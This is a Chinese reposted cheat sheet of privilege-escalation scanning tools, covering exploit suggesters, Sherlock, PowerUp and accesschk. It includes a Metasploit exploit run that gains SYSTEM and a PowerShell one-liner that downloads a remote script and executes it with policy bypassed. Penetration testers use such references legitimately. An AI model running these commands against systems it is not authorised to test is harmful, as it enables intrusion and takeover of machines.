服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

干货|提权扫描工具一览

日期: 来源:LemonSec收集编辑:Leticias Blog

使用Windows-Exploit-Suggester解析systeminfo

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

./windows-exploit-suggester.py

使用Linux-Exploit-Suggester.sh寻找linux提权问题

https://github.com/mzet-/linux-exploit-suggester

./linux-exploit-suggester.sh

使用Sherlock

https://github.com/rasta-mouse/Sherlock

Import-Module Sherlock.ps1Find-AllVulns

使用msf查询补丁和可利用提权漏洞

# 查询补丁meterpreter> run post/windows/gather/enum_patches [+] KB2999226 installed on 11/25/2020[+] KB976902 installed on 11/21/2010
# 查询Expmsf> use post/multi/recon/local_exploit_suggester msf> set LHOST <攻击机IP>msf> set SESSION <session_id>msf> run
# 利用示例msf> use exploit/windows/local/cve_2019_1458_wizardopium msf> set SESSION <session_id>msf> runmeterpreter> getuidServer username: NT AUTHORITY\SYSTEM

使用powerup检查提权漏洞

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"powershell.exe -nop -exec bypass -c "IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

使用accesschk.exe对系统扫描发现高权限可执行程序,且能够被低权限用户更改

accesschk "d:\dir"查看所有用户在d盘dir路径的子路径的权限
accesschk "Administrator "d:\dir"查看Administrator用户在d盘dir路径的子路径的权限
accesschk Administrators -c *查看Administrators组对所有服务的权限
accesschk -k Guest hklm\software查看Guest用户对hklm\software注册表的权限
accesschk -ou User查看User用户对全局对象的权限


转自Leticia's Blog


侵权请私聊公众号删文


 热文推荐  


欢迎关注LemonSec
觉得不错点个“赞”、“在看“

文章推荐

相关阅读

  • SQL 注入进阶:FLASK 加工中转 SQLMAP 流量

  • 本文仅作为技术讨论及分享,严禁用于任何非法用途。前言在渗透工作中我们经常能碰到一些逻辑复杂的 SQL 注入漏洞,并不能直接通过 sqlmap 工具注入拿到结果。今年网鼎杯的一道

  • 2022年度CNNVD漏洞奖励评选结果公告

  • 扫码订阅《中国信息安全》邮发代号 2-786征订热线:010-82341063近期,CNNVD开展了2022年度接报漏洞奖励评选工作,其中13个漏洞在我国网络安全漏洞预警及风险消控工作中发挥了积

  • Q!NPS蓝队溯源反制一键利用插件

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。工具介绍蓝队利器、溯源反

  • 9个很酷的CMD命令

  • ipconfig功能:查询本机IP地址操作方法:只要在在打开的cmd命令界面中输入“ipconfig”就可以了。msg功能:向对方电脑发送一条文本提示操作方法:首先你要知道对方的IP地址,接下来输

  • 每日安全动态推送(3-21)

  • Tencent Security Xuanwu Lab Daily News• [Windows] Exploiting CVE-2023-23397: Microsoft Outlook Elevation of Privilege Vulnerability - MDSec:https://www.mdsec.c

  • 每日安全动态推送(3-22)

  • Tencent Security Xuanwu Lab Daily News• [SECURITY ADVISORY] curl: CVE-2023-27535: FTP too eager connection reuse:https://seclists.org/oss-sec/2023/q1/176 ・

聚合标签

中国 自己的 美国 都是 疫情 的人 亿元 的是 三星 手机 华为 这款 车型 万元 企业 日本 小米 俄罗斯 民警 项目

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 大棚黄瓜领“鲜”上市

  • 黄瓜大棚内一片生机勃勃的景象。种植户李颖丽在大棚里采摘黄瓜。采摘下来的黄瓜准备装箱、打包。菜农们穿梭在黄瓜大棚里进行采摘。青翠欲滴的黄瓜挂满瓜藤。近日,扎鲁特旗巴

  • 干货|提权扫描工具一览

  • 使用Windows-Exploit-Suggester解析systeminfohttps://github.com/AonCyberLabs/Windows-Exploit-Suggester./windows-exploit-suggester.py使用Linux-Exploit-Suggester.sh

  • SQL 注入进阶:FLASK 加工中转 SQLMAP 流量

  • 本文仅作为技术讨论及分享,严禁用于任何非法用途。前言在渗透工作中我们经常能碰到一些逻辑复杂的 SQL 注入漏洞,并不能直接通过 sqlmap 工具注入拿到结果。今年网鼎杯的一道

  • 20230323

  • 牧十条是1月写的,每过一段时间我会回头总结反思各种研判,对在哪里,错在哪里,底层逻辑有没有偏差。去年三月开始加息,到今年一年,但凡对经济有些研究的就知道,加息一年是不可能降息

  • 无视版权!白嫖全网免费畅享,低调使用!

  • 大家好,我是你们的好朋友大明,欢迎大家来到【大明青年】。今日分享最近大家问有没有听音乐的网站,因为不想下载软件占内存,还想听到不少的歌曲,大明满足你们的愿望。今天给大家带